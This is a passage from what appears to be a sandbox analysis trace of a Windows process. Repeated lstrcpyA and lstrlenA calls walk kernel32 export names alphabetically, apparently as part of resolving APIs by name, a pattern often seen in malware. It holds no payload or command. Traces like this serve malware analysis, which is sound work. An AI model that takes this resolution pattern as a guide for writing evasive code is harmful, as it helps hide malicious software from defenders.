[0182.007] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0182.007] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0182.007] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0182.007] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0182.007] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0182.007] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0182.007] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0182.007] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0182.007] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0182.007] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0182.007] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0182.007] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0182.007] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0182.007] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0182.007] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0182.007] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0182.008] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0182.008] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0182.008] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0182.008] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0182.008] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0182.008] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0182.008] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0182.008] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0182.008] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0182.008] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0182.008] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0182.008] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0182.008] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0182.008] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0182.008] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0182.008] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0182.008] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0182.008] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0182.008] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0182.008] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0182.008] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0182.008] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0182.008] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0182.008] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0182.008] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0182.008] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0182.008] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0182.008] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0182.008] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0182.008] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0182.008] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0182.008] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0182.008] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0182.008] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0182.008] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0182.009] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0182.009] lstrlenA (lpString="BEEP") returned 4 [0182.009] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0182.009] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0182.009] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0182.009] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0182.009] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0182.009] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0182.009] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0182.009] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0182.009] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0182.009] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0182.009] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0182.009] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0182.009] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0182.009] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0182.009] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0182.009] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0182.009] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0182.009] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0182.009] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0182.009] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0182.009] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0182.009] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0182.009] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0182.009] lstrlenA (lpString="CANCELIO") returned 8 [0182.009] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0182.009] lstrlenA (lpString="CANCELIOEX") returned 10 [0182.009] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0182.009] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0182.009] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0182.009] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0182.009] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0182.010] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0182.010] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0182.010] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0182.010] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0182.010] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0182.010] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0182.010] lstrlenA (lpString="CHECKELEVATION") returned 14 [0182.010] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0182.010] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0182.010] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0182.010] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0182.010] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0182.010] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0182.010] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0182.010] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0182.010] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0182.010] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0182.010] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0182.010] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0182.010] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0182.010] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0182.010] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0182.010] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0182.010] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0182.010] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0182.010] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0182.010] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0182.010] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0182.010] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0182.010] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0182.010] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0182.010] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0182.010] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0182.010] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0182.011] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0182.011] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0182.011] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0182.011] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0182.011] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0182.011] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0182.011] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0182.011] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0182.011] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0182.011] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0182.011] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0182.011] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0182.011] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0182.011] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0182.011] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0182.011] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0182.011] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0182.011] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0182.011] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0182.011] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0182.011] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0182.011] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0182.011] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0182.011] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0182.011] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0182.011] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0182.011] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0182.011] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0182.011] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0182.011] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0182.011] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0182.011] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0182.011] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0182.011] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0182.011] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0182.011] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0182.011] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0182.012] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0182.012] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0182.012] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0182.012] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0182.012] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0182.012] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0182.012] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0182.012] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0182.012] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0182.012] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0182.012] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0182.012] lstrlenA (lpString="COPYCONTEXT") returned 11 [0182.012] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0182.012] lstrlenA (lpString="COPYFILEA") returned 9 [0182.012] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0182.012] lstrlenA (lpString="COPYFILEEXA") returned 11 [0182.012] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0182.012] lstrlenA (lpString="COPYFILEEXW") returned 11 [0182.012] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0182.012] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0182.012] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0182.012] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0182.012] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0182.012] lstrlenA (lpString="COPYFILEW") returned 9 [0182.012] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0182.012] lstrlenA (lpString="COPYLZFILE") returned 10 [0182.012] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0182.012] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0182.012] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0182.012] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0182.012] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0182.012] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0182.012] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0182.012] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0182.012] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0182.012] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0182.012] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0182.013] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0182.013] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0182.013] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0182.013] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0182.013] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0182.013] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0182.013] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0182.013] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0182.013] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0182.013] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0182.013] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0182.013] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0182.013] lstrlenA (lpString="CREATEEVENTA") returned 12 [0182.013] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0182.013] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0182.013] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0182.013] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0182.013] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0182.013] lstrlenA (lpString="CREATEEVENTW") returned 12 [0182.013] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0182.013] lstrlenA (lpString="CREATEFIBER") returned 11 [0182.013] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0182.013] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0182.013] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0182.013] lstrlenA (lpString="CREATEFILEA") returned 11 [0182.013] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0182.013] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0182.013] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0182.013] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0182.013] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0182.013] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0182.013] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0182.013] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0182.013] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0182.013] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0182.013] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0182.013] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0182.013] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0182.014] lstrlenA (lpString="CREATEFILEW") returned 11 [0182.014] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0182.014] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0182.014] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0182.014] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0182.014] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0182.014] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0182.014] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0182.014] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0182.014] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0182.014] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0182.014] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0182.014] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0182.014] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0182.014] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0182.014] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0182.014] lstrlenA (lpString="CREATEJOBSET") returned 12 [0182.014] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0182.014] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0182.014] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") 